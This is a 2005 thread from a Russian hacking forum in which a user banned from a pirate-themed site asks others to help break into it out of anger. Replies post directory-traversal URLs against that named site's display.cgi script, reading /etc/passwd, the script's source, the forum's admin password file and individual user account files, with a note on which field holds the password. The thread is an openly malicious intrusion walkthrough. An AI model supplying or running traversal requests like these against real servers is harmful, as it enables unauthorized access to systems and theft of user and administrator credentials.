Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Форум пиратов (https://forum.antichat.xyz/showthread.php?t=4842)

Black_Death 21.01.2005 19:46

Форум пиратов
 
Народ, помогите взломать форум на http://pirates.com.ru, а то и сам сайт. Просто меня там забанили не за что и я очень разозлился!!! А сам взломать его я не смогу. Мне очень интересно узнать какие там баги есть, чтобы совершить ВЗЛОМ (не хочу я сайт дефейсить). Заранее спасибо!

Че Гевара 22.01.2005 14:08

Копай в этом направлении:
Код:

http://pirates.com.ru/cgi-bin/display.cgi?data=../../../../etc/passwd

Black_Death 22.01.2005 15:29

Большое спасибо! И как же я сам такой баг не заметил...........

bad_boy 22.01.2005 15:51

ба то баг, но помоему это fake :)

Trinux 22.01.2005 17:20

2 bad_boy
fake???? АААА =)))) Фейк =)))) УУУУАХХАХАХХХАХА ХХАХАХАХАХА АХАХАХАХ... ууу... фууу... Блин. Спасибо за улыбку на моем лице =). Сорри парень, я тебя не высмеиваю ни в коем случае =) Смотри. http://pirates.com.ru/cgi-bin/display.cgi?data=gdfgdfgd что видишь? "Unable to open /home/pirates/public_html/gdfgdfgd". Ни о чем не говорит? А если http://pirates.com.ru/cgi-bin/displa...in/display.cgi что видим? Види сурс display.cgi. А что еще надо? Видишь сурс любых файлов на сервере, ищешь конфиги форума или еще что. Короче принцип ясен? И в следующий раз перед тем как кричать, что Че Гевара фейками раскидывается - проверь чтоль =)

2 Модеры
Сорри за оффтопик =))))

Trinux 22.01.2005 17:25

http://pirates.com.ru/cgi-bin/displa...lack_words.lst
=)))))))))))))))))))))))))))))))))))

Trinux 22.01.2005 17:33

http://pirates.com.ru/cgi-bin/displa...orum/admin.pwd
Пасс админа =)

Trinux 22.01.2005 17:34

http://pirates.com.ru/cgi-bin/displa...sers/Elvis.usr
Вместо Elvis имя пользователя. Первая переменная - пасс.

http://pirates.com.ru/cgi-bin/displa...lack_Death.usr
Пасс меняй везде =))))

Trinux 22.01.2005 17:35

А хотя нет, это все Фейк =))))))))))))))))))))) ой блин =))))

Trinux 22.01.2005 17:45

http://pirates.com.ru/cgi-bin/displa...-bin/forum.cgi
Вот, кому еще форум интересен. Я так и не понял, как админ авторизируется, но мне влом дальше =)

Че Гевара 22.01.2005 17:47

2 Trinux
:p

Black_Death 22.01.2005 18:03

Аааа....ни хрена!!!! Я на этом форуме регился дааавно! Теперь у меня пасс другой!!!

PEPSICOLA 23.01.2005 19:33

ну и пасс :D

bad_boy 23.01.2005 20:03

Цитата:

Сообщение от Trinux
И в следующий раз перед тем как кричать, что Че Гевара фейками раскидывается - проверь чтоль =)

Что за глупость. Я не говорил что это Че Гевара, я имел ввиду то что это админы сайта пиратов его подсунули.
я хоть и новичок в этом деле, но думаю что это всёже не файл паролей

Че Гевара 23.01.2005 20:12

Естественно, что это и не пароли, как таковые ...
Я просто намекнул где кроется уязвимость ...

Trinux 23.01.2005 22:29

Вообще, у меня вроде не малый опыт, но я сам лично ни разу фейка не встричал. Друзья рассказывали, а я не видел ни разу...


Время: 13:05